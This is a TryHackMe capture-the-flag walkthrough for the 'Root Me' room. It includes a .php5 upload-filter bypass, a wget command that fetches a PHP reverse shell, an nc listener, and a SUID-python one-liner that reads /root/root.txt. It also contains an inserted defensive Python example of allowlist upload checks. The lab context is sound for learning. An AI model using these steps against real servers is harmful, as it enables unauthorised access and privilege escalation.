Root Me | TryHackMe Writeup
Let’s hack
Task1 : Deploy the machine
Connect to the TryHackMe VPN:
1- Click on OpenVPN
2- Download the VPN file
3- Run the file (sudo openvpn file.ovpn)
Task2 : Reconnaissance
Nmap Scan:
nmap -sV <Machine IP>
- -sV : Version detection
There are 2 ports open:
22/ssh — OpenSSH 7.6p1
80/http — Apache httpd 2.4.29
#1.1- Scan the machine, how many ports are open?
2
#1.2- What version of Apache is running?
2.4.29
#1.3- What service is running on port 22?
SSH
Next step: fuzz directories using the Gobuster tool
gobuster dir -w <Path_To_Wordlist> -u http://<Machine_IP>
- -w : wordlist
- -u : url
#1.4- Find directories on the web server using the GoBuster tool.
No answer needed
#1.5- What is the hidden directory?
/panel/
Task3 : Getting a shell
Navigate to the URL http://<Machine_IP>
It's not an important page.
Check the panel directory.
It has a file upload vulnerability. Try to upload a file with the php extension.
The php extension is not permitted.
Try to upload a file with the php5 extension.
php5 is permitted.
So, search for the pentestmonkey PHP reverse shell on GitHub:
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Open the file and change the IP to your attacker IP and the port to the listener port on your machine.
Try to upload the file and check the uploads directory.
Click on shell.php5 while listening on your port ( nc -lvnp 4444 )
We got a shell.
I need the user flag, so I search for user.txt from the terminal with the following command:
find / -type f -name user.txt
- / : root directory
- -type f : file
- -name : file name
user.txt is located in /var/www
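The filter on /panel/ refused .php but accepted .php5, which is how an extension blocklist behaves. As an added example (not the room's code and not part of the original writeup), the Python below models that blocklist beside an allowlist check. The function names, the image-only policy and the sample uploads are assumptions constructed for illustration.

```python
import os
import secrets

# Assumed behaviour of the /panel/ filter, inferred from the writeup:
# only the ".php" extension is refused.
BLOCKED = {".php"}

# Hardened policy for an image-only upload (assumption): extension
# allowlist, each entry tied to the file signature it must start with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def weak_filter(filename: str) -> bool:
    """Blocklist: accept anything whose last extension is not listed."""
    return os.path.splitext(filename)[1].lower() not in BLOCKED

def hardened_filter(filename: str, content: bytes):
    """Return a server-generated storage name, or None if refused."""
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED:
        return None
    # Refuse extra dots ("x.php.jpg"): Apache AddHandler mappings match
    # any extension in the name, not only the last one.
    if "." in stem or "\x00" in stem:
        return None
    # The body must start with the signature of the claimed type.
    if not content.startswith(ALLOWED[ext]):
        return None
    # Never reuse the client-supplied name on disk.
    return secrets.token_hex(16) + ext

# Constructed sample uploads: (client filename, first bytes of the body).
SAMPLES = [
    ("shell.php", b"<?php "),
    ("shell.php5", b"<?php "),
    ("avatar.php.jpg", b"\xff\xd8\xff\xe0"),
    ("avatar.gif", b"<?php "),
    ("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        stored = hardened_filter(name, body)
        print(f"{name:15} weak={weak_filter(name)!s:5} hardened={stored}")
```

Filename checks are one layer only: serving the uploads directory with script execution disabled keeps a missed extension from becoming code execution.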
Task5 : Privilege escalation
Search for files with SUID permission, which file is weird?
/usr/bin/python
With the find command we can list the binaries that have the SUID bit set, and /usr/bin/python is an interesting file.
2. Find a form to escalate your privileges.
Just click Completed
Because I just need to read root.txt, I use the File read command from GTFOBins.
So, to read the root.txt file, run this command:
python -c 'print(open("/root/root.txt").read())'
Machine hacked, done.